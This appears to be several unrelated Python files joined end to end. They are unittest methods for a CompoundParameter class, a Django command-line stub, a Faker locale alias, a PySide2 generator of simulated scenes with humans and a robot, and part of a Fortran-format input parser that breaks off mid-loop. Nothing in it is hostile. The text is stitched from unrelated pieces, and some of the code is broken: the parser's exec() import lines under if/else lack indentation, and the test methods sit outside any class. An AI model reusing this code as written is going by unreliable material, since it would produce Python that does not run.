    self.assertEqual( len( p.defaultValue ), 2 )
    self.assertEqual( p.defaultValue, CompoundObject( { "i" : IntData( 10 ), "f" : FloatData( 20 ) } ) )
def testRemoveParameters( self ) :
    """removeParameter() must drop the child from both the default value
    and the current value.

    Fix: the original used the Python-2-only ``raise Exception, "msg"``
    statement inside a bare try/except/else dance; both are replaced with
    assertRaises, which expresses the same expectation and parses on
    Python 3.
    """
    a = CompoundParameter( "a", "a desc",
        members = [
            StringParameter( "b", "b desc", "test 1 ok!"),
            StringParameter( "d", "d desc", "test 2 failed!"),
        ]
    )
    c = a.getValue()
    r = a.defaultValue
    a.removeParameter( "d" )
    # the removed key is gone from the default value...
    self.assertRaises( Exception, lambda : a.defaultValue['d'] )
    # ...and from the current value.
    self.assertRaises( Exception, lambda : a.getValue()['d'] )
def testDelParameters( self ) :
    """del p["name"] removes the child from the parameter itself, from its
    default value and from its current value."""
    a = CompoundParameter( "a", "a desc",
        members = [
            StringParameter( "b", "b desc", "test 1 ok!"),
            StringParameter( "d", "d desc", "test 2 failed!"),
        ]
    )
    c = a.getValue()
    r = a.defaultValue
    del a["d"]
    self.assert_( not "d" in a )
    for view in ( a.defaultValue, a.getValue() ) :
        self.assert_( not "d" in view )
def testAddParametersPresets( self ) :
    """Adding children narrows the adopted presets to the intersection of
    all children's preset names; insertParameter() controls ordering."""
    p = CompoundParameter(
        name = "c",
        description = "d",
        members = []
    )
    self.assertEqual( p.getPresets(), {} )
    p.addParameter( IntParameter( name = "i", description = "d", defaultValue = 10, presets = ( ( "one", 1 ), ( "two", 2 ) ) ) )
    self.assertEqual( len( p.getPresets() ), 2 )
    self.assertEqual( p.getPresets(), { "one" : CompoundObject( { "i" : IntData( 1 ) } ), "two" : CompoundObject( { "i" : IntData( 2 ) } ) } )
    # the new child only defines "one", so "two" drops out of the intersection
    fParam = FloatParameter( name = "f", description = "d", defaultValue = 20, presets = ( ( "one", 1 ), ) )
    p.addParameter( fParam )
    self.assertEqual( len( p.getPresets() ), 1 )
    self.assertEqual( p.getPresets(), { "one" : CompoundObject( { "i" : IntData( 1 ), "f" : FloatData( 1 ) } ) } )
    # insertParameter() places "x" before the existing "f"
    p.insertParameter( IntParameter( name = "x", description = "x", defaultValue = 10 ), fParam )
    self.assertEqual( p.keys(), [ "i", "x", "f" ] )
def testSmartSetValue( self ):
    """Test python overwriting: smartSetValue()"""
    p = CompoundParameter(
        name = "c",
        description = "d",
        members = [
            IntParameter( "i", "d", 1 ),
            FloatParameter( "f", "d", 2 )
        ],
        userData = CompoundObject( { "a": BoolData( False ) } )
    )
    q = CompoundParameter(
        name = "c",
        description = "d",
        members = [
            IntParameter( "i", "d", 10 ),
            FloatParameter( "f", "d", 20 )
        ],
    )
    self.assert_( p["i"].getTypedValue() == 1 )
    self.assert_( p["f"].getValue() == FloatData( 2 ) )
    # smartSetValue accepts a CompoundObject...
    p.smartSetValue( CompoundObject( { "i": IntData(10), "f": FloatData(20) } ) )
    self.assert_( p["i"].getTypedValue() == 10 )
    self.assert_( p["f"].getValue() == FloatData( 20 ) )
    # ...or a plain python dict with raw values
    p.smartSetValue( { "i": 4, "f": 4 } )
    self.assert_( p["i"].getTypedValue() == 4 )
    self.assert_( p["f"].getValue() == FloatData( 4 ) )
    # adding another CompoundParameter
    p.addParameter( q )
    r = p.getValue().copy()
    r['c']['i'].value = 15
    # mutating the copy must not affect the parameter until it is set back
    self.assert_( p['c']['i'].getTypedValue() == 10 )
    p.smartSetValue( r )
    self.assert_( p['c']['i'].getTypedValue() == 15 )
    # nested plain dicts are converted recursively
    p.smartSetValue( { 'i': 1, 'f': 2, 'c': { 'i': 3, 'f': 4 } } )
    self.assert_( p['i'].getTypedValue() == 1 )
    self.assert_( p['f'].getValue() == FloatData( 2 ) )
    self.assert_( p['c']['i'].getTypedValue() == 3 )
    self.assert_( p['c']['f'].getValue() == FloatData( 4 ) )
def testSmartSetItem( self ):
    """Test smart __setitem__"""
    p = CompoundParameter(
        name = "c",
        description = "d",
        members = [
            IntParameter( "i", "d", 1 ),
        ],
    )
    self.assert_( p["i"].getTypedValue() == 1 )
    # __setitem__ accepts both a raw python value and typed Data
    for newValue, expected in ( ( 20, 20 ), ( IntData(30), 30 ) ) :
        p["i"] = newValue
        self.assert_( p["i"].getTypedValue() == expected )
def testAttributeAccessRemoval( self ) :
    """Child access via attribute notation must raise AttributeError."""
    # we used to allow access to child parameters
    # using the parent.child attribute notation, but
    # after deprecating it in version 4 we removed it
    # in version 5. check that it's removed.
    p = CompoundParameter(
        name = "c",
        description = "d",
        members = [
            IntParameter( "i", "d", 1 ),
        ],
    )
    self.assertRaises( AttributeError, getattr, p, "i" )
def testParameterPath( self ) :
    """parameterPath() returns the list of names from the compound down to
    the given child, and an empty list for a non-member parameter."""
    p = CompoundParameter(
        name = "c",
        description = "d",
        members = [
            IntParameter( "i", "d", 1, ),
            FloatParameter( "f", "d", 2, ),
            CompoundParameter( "c", "d", members = [
                IntParameter( "j", "d", 10 ),
                ]
            )
        ]
    )
    self.assertEqual( p.parameterPath( p["i"] ), [ "i" ] )
    self.assertEqual( p.parameterPath( p["f"] ), [ "f" ] )
    self.assertEqual( p.parameterPath( p["c"]["j"] ), [ "c", "j" ] )
    # an unrelated parameter (even with a matching name) yields no path
    self.assertEqual( p.parameterPath( IntParameter( "i", "d", 10 ) ), [] )
    # paths are relative to the compound the query is made on
    self.assertEqual( p["c"].parameterPath( p["c"]["j"] ), [ "j" ] )
def testParameterPathBug( self ) :
    """Regression test: parameterPath() must descend correctly through
    compounds that were added after construction."""
    p = CompoundParameter( name="c", description="" )
    p.addParameter(
        CompoundParameter(
            name = "n",
            description = "",
            members = [
                IntParameter( name="i", description="", defaultValue = 1 ),
                CompoundParameter( name="j", description="", members = [ IntParameter( "k", "", 10 ) ] )
            ]
        )
    )
    self.assertEqual( p.parameterPath( p["n"]["i"] ), [ "n", "i" ] )
    self.assertEqual( p.parameterPath( p["n"]["j"]["k"] ), [ "n", "j", "k" ] )
def testClearParameters( self ) :
    """clearParameters() empties the compound completely."""
    a = CompoundParameter( "a", "a desc",
        members = [
            StringParameter( "b", "b desc", "test 1 ok!"),
            StringParameter( "d", "d desc", "test 2 failed!"),
        ]
    )
    self.assertEqual( len( a ), 2 )
    a.clearParameters()
    # every view of the children must now be empty
    self.assertEqual( len( a ), 0 )
    self.assertEqual( a.keys(), [] )
    self.assertEqual( a.values(), [] )
    for missing in ( "b", "d" ) :
        self.assertRaises( Exception, a.__getitem__, missing )
def testSetValueWithMissingData( self ) :
    """Setting a value captured before a child was added must leave the
    newer child at its own value rather than failing."""
    c = CompoundParameter()
    c1 = StringParameter( "child1", "child1", "child1" )
    c.addParameter( c1 )
    preset = c.getValue()
    c2 = StringParameter( "child2", "child2", "child2" )
    c2value = c2.getValue()
    c.addParameter( c2 )
    # preset has no entry for child2
    c.setValue( preset )
    self.assertEqual( c2value, c["child2"].getValue() )
def testItems( self ) :
    """items() yields (name, parameter) pairs, in insertion order, with the
    actual child parameter objects (not copies)."""
    a = CompoundParameter( "a", "a desc",
        members = [
            StringParameter( "b", "b desc", "test 1 ok!"),
            StringParameter( "d", "d desc", "test 2 failed!"),
        ]
    )
    items = a.items()
    self.assertEqual( len( items ), 2 )
    self.assertEqual( len( items[0] ), 2 )
    self.assertEqual( len( items[1] ), 2 )
    self.assertEqual( items[0][0], "b" )
    self.assertEqual( items[1][0], "d" )
    # identity, not equality: items() must hand back the same objects
    self.failUnless( items[0][1].isSame( a["b"] ) )
    self.failUnless( items[1][1].isSame( a["d"] ) )
def testValueValidReason( self ) :
    """The invalid-value reason reported by a compound prefixes the child's
    reason with the dotted path to that child."""
    i = IntParameter( "i", "", 1, 0, 10 )
    c = CompoundParameter(
        "c",
        members = [
            i
        ]
    )
    childReason = i.valueValid( IntData( 20 ) )[1]
    compoundReason = c.valueValid( CompoundObject( { "i" : IntData( 20 ) } ) )[1]
    self.assertEqual( compoundReason, "i : " + childReason )
    # one level deeper: the path becomes "c.i"
    cc = CompoundParameter(
        members = [
            c
        ]
    )
    compoundCompoundReason = cc.valueValid( CompoundObject( { "c" : { "i" : IntData( 20 ) } } ) )[1]
    self.assertEqual( compoundCompoundReason, "c.i : " + childReason )
def testAdoptChildPresets( self ) :
    """The adoptChildPresets flag controls whether a CompoundParameter derives
    its own presets/presetsOnly from its children; explicit setPresets() must
    still work when adoption is off."""
    # backward compatible behaviour: adoption is on by default, so the
    # compound inherits the two shared child presets and presetsOnly=True.
    c = CompoundParameter(
        "c",
        members = [
            IntParameter(
                "a",
                "description",
                1,
                presets = (
                    ( "one", 1 ),
                    ( "two", 2 ),
                ),
                presetsOnly = True,
            ),
            IntParameter(
                "b",
                "description",
                1,
                presets = (
                    ( "one", 1 ),
                    ( "two", 2 ),
                ),
                presetsOnly = True,
            ),
        ],
    )
    self.assertEqual( len( c.getPresets() ), 2 )
    self.assertEqual( c.presetsOnly, True )
    # no adoption of presets when adoptChildPresets=False is passed by keyword.
    c = CompoundParameter(
        "c",
        members = [
            IntParameter(
                "a",
                "description",
                1,
                presets = (
                    ( "one", 1 ),
                    ( "two", 2 ),
                ),
                presetsOnly = True,
            ),
            IntParameter(
                "b",
                "description",
                1,
                presets = (
                    ( "one", 1 ),
                    ( "two", 2 ),
                ),
                presetsOnly = True,
            ),
        ],
        adoptChildPresets = False,
    )
    self.assertEqual( len( c.getPresets() ), 0 )
    self.assertEqual( c.presetsOnly, False )
    # no adoption of presets without use of keyword parameters: the positional
    # form is (name, description, members, userData, adoptChildPresets).
    c = CompoundParameter(
        "c",
        "description",
        [
            IntParameter(
                "a",
                "description",
                1,
                presets = (
                    ( "one", 1 ),
                    ( "two", 2 ),
                ),
                presetsOnly = True,
            ),
            IntParameter(
                "b",
                "description",
                1,
                presets = (
                    ( "one", 1 ),
                    ( "two", 2 ),
                ),
                presetsOnly = True,
            ),
        ],
        CompoundObject( { "ud" : IntData( 10 ) } ),
        False,
    )
    self.assertEqual( len( c.getPresets() ), 0 )
    self.assertEqual( c.presetsOnly, False )
    self.assertEqual( c.userData()["ud"].value, 10 )
    # when adoptChildPresets is off we can also set presets explicitly...
    c['a'].setValue("one")
    c['b'].setValue("two")
    p1 = c.getValue().copy()
    c['a'].setValue("two")
    c['b'].setValue("one")
    p2 = c.getValue().copy()
    c.setValue( c.defaultValue )
    c.setPresets(
        [
            ( "p1", p1 ),
            ( "p2", p2 ),
        ]
    )
    pr = c.getPresets()
    self.assertEqual( len( pr ), 2 )
    self.assertEqual( pr["p1"], p1 )
    self.assertEqual( pr["p2"], p2 )
    self.assertEqual( c.presetNames(), ( "p1", "p2" ) )
    # Selecting a preset by name applies the stored compound value.
    c.setValue("p1")
    self.assertEqual( c.getValue(), p1 )
    c.setValue("p2")
    self.assertEqual( c.getValue(), p2 )
def testDerivingInPython( self ) :
    """A CompoundParameter subclass defined in Python (and registered with the
    run-time-typed system) must participate in parameterPath() like a native one."""
    class DerivedCompoundParameter( CompoundParameter ) :
        def __init__( self, name, description, userData = None ) :
            CompoundParameter.__init__( self, name, description, userData = userData )
    registerRunTimeTyped( DerivedCompoundParameter )
    c = CompoundParameter()
    c.addParameter( DerivedCompoundParameter( "d", "" ) )
    c["d"].addParameter( IntParameter( "i", "", 1 ) )
    # The derived compound is traversed transparently when building the path.
    self.assertEqual( c.parameterPath( c["d"]["i"] ), [ "d", "i" ] )
if __name__ == "__main__":
    # Run the test suite when this module is executed directly.
    unittest.main()
|
#!c:\users\30026663\desktop\learn\c9b1~1\sayt1\sayt1\venv\venv\scripts\python.exe
# Thin Django command-line entry point: delegates to the management
# command dispatcher (equivalent to running django-admin).
from django.core import management
if __name__ == "__main__":
    management.execute_from_command_line()
|
from ..en_PH import Provider as EnPhInternetProvider


# Locale alias: re-exports the en_PH internet provider unchanged.
class Provider(EnPhInternetProvider):
    """No difference from Internet Provider for en_PH locale"""
    pass
|
import random
import math, numpy
import json
import time
from PySide2 import QtCore, QtGui, QtWidgets
from human import Human, Head
from robot import Robot
from midPoint import MidPoint
from regularobject import RegularObject
from irregularobject import IrregularObject
from room import Room
from interaction import Interaction
MAX_GENERATION_WAIT = 1.
class WorldGenerator(QtWidgets.QGraphicsScene):
    """QGraphicsScene that holds a social-navigation world: a room, two
    humans (with heads), their midpoint, optional objects, interactions and
    a robot at the origin.

    The scene is either generated randomly (``generateRandomWorld``) or
    reconstructed from a JSON string previously produced by ``serialize``.
    """

    # Class-wide counter used to hand out unique dataset identifiers to
    # randomly generated scenes.
    available_identifier = 0

    def __init__(self, data=None):
        """Create a world; random when ``data`` is None, otherwise rebuilt
        from the JSON string ``data``."""
        super(WorldGenerator, self).__init__()
        # Scene spans 800x800 units centred at the origin (2 units margin).
        self.setSceneRect(-400, -400, 800 - 2, 800 - 2)
        self.setItemIndexMethod(QtWidgets.QGraphicsScene.NoIndex)
        if data is None:
            self.generateRandomWorld()
        else:
            self.generateFromData(data)

    def generateFromData(self, raw_data):
        """Rebuild the scene from a JSON string (the ``serialize`` format)."""
        data = json.loads(raw_data)
        # Maps serialized entity ids back to the recreated scene items so
        # links can be resolved below.
        idMap = dict()
        self.clear()
        # identifier is stored as e.g. "00012 A"; keep the numeric part.
        self.ds_identifier = int(data['identifier'].split()[0])
        self.room = Room(data['room'])
        self.addItem(self.room)
        self.humans = []
        for raw_human in data['humans']:
            human = Human.from_json(raw_human)
            self.addItem(human)
            self.humans.append(human)
            idMap[raw_human['id']] = human
        self.heads = []
        for raw_head in data['heads']:
            head = Head.from_json(raw_head)
            self.addItem(head)
            self.heads.append(head)
            idMap[raw_head['id']] = head
        self.objects = []
        for raw_object in data['objects']:
            obj = RegularObject.from_json(raw_object)
            self.addItem(obj)
            self.objects.append(obj)
            idMap[raw_object['id']] = obj
        self.interactions = []
        interactions_done = []
        for interaction_raw in data['links']:
            # Links are stored in both directions for human-human pairs;
            # only instantiate one Interaction per unordered pair.
            if not [interaction_raw[1], interaction_raw[0], interaction_raw[2]] in interactions_done:
                interactions_done.append(interaction_raw)
                human = idMap[interaction_raw[0]]
                other = idMap[interaction_raw[1]]
                interaction = Interaction(human, other)
                self.interactions.append(interaction)
                self.addItem(interaction)
        #self.irregularobjects = []
        #for raw_irregularobjects in data['irregularobjects']:
            #obj = IrregularObject.from_json(raw_irregularobjects)
            #self.addItem(obj)
            #self.irregularobjects.append(obj)
            #idMap[raw_irregularobjects['id']] = obj
        self.robot = Robot()
        self.robot.setPos(0, 0)
        self.addItem(self.robot)

    def generateRandomWorld(self):
        """Generate a random scene, retrying until generation finishes within
        MAX_GENERATION_WAIT (``generate`` raises RuntimeError on timeout)."""
        done = False
        self.ds_identifier = WorldGenerator.available_identifier
        WorldGenerator.available_identifier += 1
        while not done:
            try:
                self.generation_time = time.time()
                self.generate()
                done = True
                # print(time.time()-self.generation_time)
            except RuntimeError:
                pass

    @staticmethod
    def distanceTo(something):
        """Integer euclidean distance from the origin (robot position) to
        an item exposing xPos/yPos."""
        return int(math.sqrt(something.xPos*something.xPos + something.yPos*something.yPos))

    @staticmethod
    def angleTo(something):
        """Integer angle (degrees, normalised to (-180, 180]) from the origin
        to an item exposing xPos/yPos, with a +90 degree frame offset."""
        angle = int(int(180.*math.atan2(something.yPos, something.xPos)/math.pi)+90.)
        if angle > 180.: angle = -360.+angle
        return angle

    def serialize(self, score=-1):
        """Serialize the scene to a plain dict (and print it as JSON when a
        non-negative ``score`` is given). Inverse of ``generateFromData``."""
        structure = dict()
        structure['identifier'] = str(self.ds_identifier).zfill(5) + ' A'
        structure['score'] = 0
        if score > 0:
            structure['score'] = score
        structure['robot'] = {'id': 0}
        humansList = []
        for human in self.humans:
            h = dict()
            h['id'] = human.id
            h['xPos'] = +human.xPos
            h['yPos'] = +human.yPos
            h['orientation'] = +human.angle
            h['head_orientation'] = +human.angleHead
            humansList.append(h)
        structure['humans'] = humansList
        headsList = []
        for head in self.heads:
            h = dict()
            h['id'] = head.id
            h['xPos'] = +head.xPos
            h['yPos'] = +head.yPos
            h['orientation'] = +head.angle
            headsList.append(h)
        structure['heads'] = headsList
        objectsList = []
        for object in self.objects:
            o = dict()
            o['id'] = object.id
            o['xPos'] = +object.xPos
            o['yPos'] = +object.yPos
            o['orientation'] = +object.angle
            objectsList.append(o)
        structure['objects'] = objectsList
        structure['links'] = []
        for interaction in self.interactions:
            structure['links'].append( [interaction.a.id, interaction.b.id, 'interact'] )
            # Human-human interactions are symmetric, so store both directions.
            if type(interaction.b) is Human:
                structure['links'].append( [interaction.b.id, interaction.a.id, 'interact'] )
        #irregularObjectsList = []
        #for object in self.irregularobjects:
            #o = dict()
            #o['id'] = object.id
            #o['xPos'] = +object.xPos
            #o['yPos'] = +object.yPos
            #o['w'] = +object.w
            #o['h'] = +object.h
            #o['orientation'] = +object.angle
            #irregularObjectsList.append(o)
        #structure['irregularobjects'] = irregularObjectsList
        structure['room'] = [ [+point.x(), point.y()] for point in self.room.poly ]
        if score >= 0:
            print(json.dumps(structure))
        return structure

    def generateHuman(self, availableId):
        """Generate a human at a random pose inside the room; raises
        RuntimeError if placement takes longer than MAX_GENERATION_WAIT."""
        human = None
        while human is None:
            if time.time() - self.generation_time > MAX_GENERATION_WAIT:
                raise RuntimeError('MAX_GENERATION_ATTEMPTS')
            # 1-in-3 chance of a centre-biased (gaussian) position, else uniform.
            if QtCore.qrand() % 3 == 0:
                xx = int(random.normalvariate(0, 150))
                yy = int(random.normalvariate(0, 150))
            else:
                xx = QtCore.qrand()%800-400
                yy = QtCore.qrand()%800-400
            angleHuman = (QtCore.qrand()%360)-180
            # Head deviates from the body orientation by a random offset.
            angleHead = angleHuman + random.choice([-1,1])*QtCore.qrand()%100
            human = Human(availableId, xx, yy, angleHuman, angleHead)
            if not self.room.containsPolygon(human.polygon()):
                human = None
        return human

    def generateComplementaryHuman(self, human, availableId):
        """Generate a second human facing ``human`` at a random distance along
        its line of sight, shrinking the distance (or flipping the first
        human) until the result fits in the room."""
        a = math.pi*human.angle/180.
        dist = float(QtCore.qrand()%300+50)
        human2 = None
        while human2 is None:
            if time.time() - self.generation_time > MAX_GENERATION_WAIT:
                raise RuntimeError('MAX_GENERATION_ATTEMPTS')
            xPos = human.xPos+dist*math.sin(a)
            yPos = human.yPos-dist*math.cos(a)
            human2 = Human(availableId, xPos, yPos, human.angle+180)
            if not self.room.containsPolygon(human2.polygon()):
                dist -= 5
                if dist < 20:
                    # No room in this direction: turn the first human around
                    # and retry with a fresh distance.
                    human.setAngle(human.angle+180)
                    a = math.pi*human.angle/180.
                    dist = float(QtCore.qrand()%300+50)
                human2 = None
        return human2

    #def generateHumanHead(self, human):
        #head = None
        #while head is None:
            ##print ("human.angle", human.angle)
            #angle = human.angle + random.choice([-1,1])*QtCore.qrand()%100
            #if angle > 180.: angle = -360. + angle
            #if angle < -180.: angle = angle + 360
            #head = Head(human.id, human.xPos, human.yPos, angle)
            ##if -180 <= a <= 180:
        #return head

    def generateComplementaryObject(self, human, availableId):
        """Generate an object in front of ``human``, shrinking the distance
        until it fits in the room (same strategy as the complementary human)."""
        a = math.pi*human.angle/180.
        dist = float(QtCore.qrand()%250+50)
        obj = None
        while obj is None:
            if time.time() - self.generation_time > MAX_GENERATION_WAIT:
                raise RuntimeError('MAX_GENERATION_ATTEMPTS')
            xPos = human.xPos+dist*math.sin(a)
            yPos = human.yPos-dist*math.cos(a)
            obj = RegularObject(availableId, xPos, yPos, (human.angle+180)%360)
            if not self.room.containsPolygon(obj.polygon()):
                dist -= 5
                if dist <= 5:
                    obj.setAngle(human.angle+180)
                    a = math.pi*human.angle/180.
                    dist = float(QtCore.qrand()%300+50)
                obj = None
        return obj

    def generateInteractuatorHuman(self, human, availableId):
        """Generate a human interacting with ``human``: placed along its gaze
        at a random distance, roughly facing back (+-25 deg), with its own
        random head offset."""
        a = math.pi*human.angle/180.  # angle in radians
        dist = float(QtCore.qrand()%300+50)
        human2 = None
        while human2 is None:
            if time.time() - self.generation_time > MAX_GENERATION_WAIT:
                raise RuntimeError('MAX_GENERATION_ATTEMPTS')
            xPos = human.xPos+dist*math.sin(a)
            yPos = human.yPos-dist*math.cos(a)
            l = [1,-1]
            option = random.choice (l)
            angle = human.angle+180 + (option*QtCore.qrand()%25)
            # print('angle human2:', angle)
            if angle > 180.: angle = -360. + angle
            # print('angle human2 normalize:', angle)
            angleHead = angle + random.choice([-1,1])*QtCore.qrand()%100
            human2 = Human(availableId, xPos, yPos, angle,angleHead)
            if not self.room.containsPolygon(human2.polygon()):
                dist -= 5
                if dist < 20:
                    human.setAngle(human.angle+180)
                    a = math.pi*human.angle/180.
                    dist = float(QtCore.qrand()%300+50)
                human2 = None
        return human2

    def generateObject(self, availableId):
        """Generate a regular object at a random pose inside the room."""
        object = None
        while object is None:
            if time.time() - self.generation_time > MAX_GENERATION_WAIT:
                raise RuntimeError('MAX_GENERATION_ATTEMPTS')
            if QtCore.qrand() % 3 == 0:
                xx = int(random.normalvariate(0, 150))
                yy = int(random.normalvariate(0, 150))
            else:
                xx = QtCore.qrand()%800-400
                yy = QtCore.qrand()%800-400
            object = RegularObject(availableId, xx, yy, (QtCore.qrand()%360)-180)
            if not self.room.containsPolygon(object.polygon()):
                object = None
        return object

    def generateIrregularObject(self, availableId):
        """Generate an irregular (rectangular, random-sized) object inside the
        room; sizes below the 10-unit minimum are rejected and retried."""
        object = None
        while object is None:
            if time.time() - self.generation_time > MAX_GENERATION_WAIT:
                raise RuntimeError('MAX_GENERATION_ATTEMPTS')
            if QtCore.qrand() % 3 == 0:
                xx = int(random.normalvariate(0, 150))
                yy = int(random.normalvariate(0, 150))
                ww = int(random.normalvariate(20, 50))
                hh = int(random.normalvariate(20, 50))
            else:
                xx = QtCore.qrand()%800-400
                yy = QtCore.qrand()%800-400
                ww = QtCore.qrand()%800/4-400/4
                hh = QtCore.qrand()%800/4-400/4
            if (ww>10 and hh>10):
                object = IrregularObject(availableId, xx, yy, ww, hh, (QtCore.qrand()%360)-180)
            if object is not None:
                if not self.room.containsPolygon(object.polygon()):
                    object = None
        return object

    def generate(self):
        """Build a fresh scene: a room, two humans (second one either
        interacting with or independent of the first), their heads, the
        midpoint marker between them, and the robot at the origin."""
        regenerateScene = True
        while regenerateScene:
            availableId = 1
            regenerateScene = False
            self.clear()
            self.humans = []
            self.heads = []
            self.objects = []
            self.interactions = []
            #self.irregularobjects =[]
            self.room = Room()
            self.addItem(self.room)
            # ONLY TWO HUMAN BEINGS
            human = self.generateHuman(availableId)
            head = Head (human.id, human.xPos, human.yPos, human.angleHead )
            #head = self.generateHumanHead(human)
            availableId += 1
            self.addItem(human)
            self.humans.append(human)
            # heads
            self.addItem(head)
            #self.heads.append(head)
            human2 = None
            while human2 is None:
                # 50/50: second human interacts with the first, or is independent.
                if QtCore.qrand()%2 == 0:
                    human2 = self.generateInteractuatorHuman(human, availableId)
                    # CHECK: do we need to create an interaction here?
                    # interaction = Interaction(human, human2)
                    # self.interactions.append(interaction)
                    # self.addItem(interaction)
                else:
                    human2 = self.generateHuman(availableId)
                # Reject overlapping placements and retry.
                if human.polygon().intersects(human2.polygon()):
                    human2=None
            head2 = Head (human2.id, human2.xPos, human2.yPos, human2.angleHead )
            #head2 = self.generateHumanHead(human2)
            #print ("-----")
            availableId += 1
            self.addItem(human2)
            self.humans.append(human2)
            # heads
            self.addItem(head2)
            #self.heads.append(head2)
            # Compute the midpoint of the two humans. Adri
            x1 = human.xPos
            y1 = human.yPos
            x2 = human2.xPos
            y2 = human2.yPos
            x_pm = (x1 + x2)/2
            y_pm = (y1 + y2)/2
            punto_medio = QtCore.QPointF(x_pm, y_pm)  # midpoint (x, y)
            punto_human = QtCore.QPointF(x1, y1)  # human 1 coordinate
            punto_human2 = QtCore.QPointF(x2, y2)  # human 2 coordinate
            a = numpy.array((x1 ,y1))
            b = numpy.array((x2, y2))
            dist = numpy.linalg.norm(a-b)
            self.midPoint = MidPoint()
            self.midPoint.setHumansPoints(punto_human,punto_human2)
            self.midPoint.setMidPoint(punto_medio)
            self.midPoint.setDist(dist)
            self.addItem(self.midPoint)
            # generate regular objects
            # objectCount = int(abs(random.normalvariate(1, 4))) % 5
            # #print ("objectCount",objectCount)
            # if objectCount == 0:
            #     objectCount = QtCore.qrand() % 3
            # for i in range(objectCount):
            #     # print (i)
            #     object = self.generateObject(availableId)
            #     # Skip if it intersects another already-created object
            #     if any (object.polygon().intersects(x.polygon()) for x in self.objects):
            #         continue
            #     # check if it collides with human beings
            #     if any (object.polygon().intersects(x.polygon()) for x in self.humans):
            #         continue
            #     availableId += 1
            #     self.addItem(object)
            #     self.objects.append(object)
            # generate IRREGULAR objects
            #objectCount = int(abs(random.normalvariate(1, 4))) % 15
            ## print ("irregular objects",objectCount)
            #if objectCount == 0:
                #objectCount = QtCore.qrand() % 3
            #for i in range(objectCount):
                ## print (i)
                #object = self.generateIrregularObject(availableId)
                ###check if intersect with regular IRREGULARobjects
                #if any (object.polygon().intersects(x.polygon()) for x in self.irregularobjects):
                    #continue
                ##check if intersect with humans
                #if any (object.polygon().intersects(x.polygon()) for x in self.humans):
                    #continue
                ##check if intersect with regular objects
                #if any (object.polygon().intersects(x.polygon()) for x in self.objects):
                    #continue
                #availableId += 1
                #self.addItem(object)
                #self.irregularobjects.append(object)
            #print ("----Sel.irregularobjets: len", len(self.irregularobjects))
            #print ("----Self.objects: len", len(self.objects))
            self.robot = Robot()
            self.robot.setPos(0, 0)
            self.addItem(self.robot)
            #self.text = 'Humans:' + str(len(self.humans)) + ' ' + 'Objects:' + str(len(self.objects))+ ' ' + 'Irregular Objects:' + str(len(self.irregularobjects))
|
import re
import pdb
import sys
IS_PYTHON3 = sys.version_info[0] >= 3
if IS_PYTHON3:
exec('from ._edit_descriptors import *')
exec('from ._misc import expand_edit_descriptors, has_next_iterator')
exec('from . import config')
else:
exec('from _edit_descriptors import *')
exec('from _misc import expand_edit_descriptors, has_next_iterator')
exec('import config')
WIDTH_OPTIONAL_EDS = [A]
NON_WIDTH_EDS = [BN, BZ, P, SP, SS, S, X, T, TR, TL, Colon, Slash]
FORBIDDEN_EDS = [QuotedString, H]
# Some problems without pre written input vars:
# Cannot say when reversion conditions are met
# Cannot determine width of A edit descriptor
# Cannot determine complex input
# Cannot determine proper input for G edit descriptors
def input(eds, reversion_eds, records, num_vals=None):
    """Read values from Fortran-formatted input records.

    Args:
        eds: list of edit descriptors forming the format.
        reversion_eds: edit descriptors reused when the main format is
            exhausted (Fortran format reversion).
        records: the input, either as a newline-separated string or as an
            iterator of record strings.
        num_vals: number of values to read; defaults to one per output edit
            descriptor in ``eds``.

    Returns:
        List of parsed values, at most ``num_vals`` long. Unwritten values
        may be returned as None or dropped depending on the config flags.

    Raises:
        InvalidFormat: if an output-only edit descriptor appears in the format.
        ValueError: if reversion can never produce the requested values, or
            a field cannot be parsed (when 'exception_on_fail' is set).
    """
    # Mutable parse state threaded through the read_* helpers.
    state = {
        'position': 0,
        'scale': 0,
        'incl_plus': False,
        'blanks_as_zeros': config.PROC_BLANKS_AS_ZEROS,
        # TODO: Implement halt if no more record input
        'halt_if_no_vals': False,
        'exception_on_fail': True,
    }
    for ed in eds + reversion_eds:
        if isinstance(ed, tuple(FORBIDDEN_EDS)):
            # Fixed: the message previously contained a bare, never-filled
            # '%d' placeholder ("%d edit descriptr ..."); interpolate the
            # offending descriptor instead.
            raise InvalidFormat('%s edit descriptor not permitted on input' % str(ed))
    # Expand repeated edit descriptors
    eds = expand_edit_descriptors(eds)
    reversion_eds = expand_edit_descriptors(reversion_eds)
    # Assume one-to-one correspondence between edit descriptors and output
    # values if number of output values is not defined
    num_out_eds = 0
    for ed in eds:
        if isinstance(ed, OUTPUT_EDS):
            num_out_eds += 1
    num_rev_out_eds = 0
    if num_vals is None:
        num_vals = num_out_eds
    for ed in reversion_eds:
        if isinstance(ed, OUTPUT_EDS):
            num_rev_out_eds += 1
    # Would loop forever if there are no output edit descriptors
    if (num_out_eds == 0):
        return []
    # Would loop forever if there are no output eds in the reversion format
    # and more values are requested than the main format provides
    if (num_vals > num_out_eds) and (num_rev_out_eds == 0):
        raise ValueError('Not enough output edit descriptors in reversion format to output %d values' % num_vals)
    # May need to process multiple records; split a string input into
    # individual records here.
    # NOTE(review): Python 3 iterators expose __next__, not 'next', so a
    # pre-built iterator passed in under Python 3 would fall through to
    # re.split and fail -- confirm callers always pass a string on py3.
    if not hasattr(records, 'next'):
        records = iter(re.split('\r\n|\r|\n', records))
    record = _next(records, None)
    if record is None:
        return []
    vals = []
    finish_up = False
    ed_ind = -1
    while True:
        ed_ind += 1
        # Signal to stop when a Colon edit descriptor, the end of the format,
        # or the end of the reversion format is reached, and to output no
        # more data
        if len(vals) >= num_vals:
            finish_up = True
        # Select the appropriate edit descriptor
        if ed_ind < len(eds):
            ed = eds[ed_ind]
        else:
            rev_ed_ind = (ed_ind - len(eds)) % len(reversion_eds)
            # Reversion begun and has been instructed to halt
            if finish_up and (rev_ed_ind == 0):
                break
            ed = reversion_eds[rev_ed_ind]
        if isinstance(ed, QuotedString):
            raise InvalidFormat('Cannot have string literal in an input format')
        elif isinstance(ed, BN):
            state['blanks_as_zeros'] = False
        elif isinstance(ed, BZ):
            state['blanks_as_zeros'] = True
        elif isinstance(ed, P):
            state['scale'] = ed.scale
        elif isinstance(ed, SP):
            state['incl_plus'] = True
        elif isinstance(ed, SS):
            state['incl_plus'] = False
        elif isinstance(ed, S):
            state['incl_plus'] = config.PROC_INCL_PLUS
        elif isinstance(ed, (X, TR)):
            # Move right, clamped to the record length
            state['position'] = min(state['position'] + ed.num_chars, len(record))
        elif isinstance(ed, TL):
            # Move left, clamped to the record start
            state['position'] = max(state['position'] - ed.num_chars, 0)
